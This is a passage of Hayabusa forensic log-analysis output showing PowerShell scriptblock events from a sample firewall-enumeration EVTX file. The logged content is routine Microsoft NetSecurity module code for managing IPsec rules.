($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShe,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ll.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecRule' function Remove-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] 
${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Manage",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ment.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName 
)) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) 
$__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 
'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.Paramete",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"rSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and 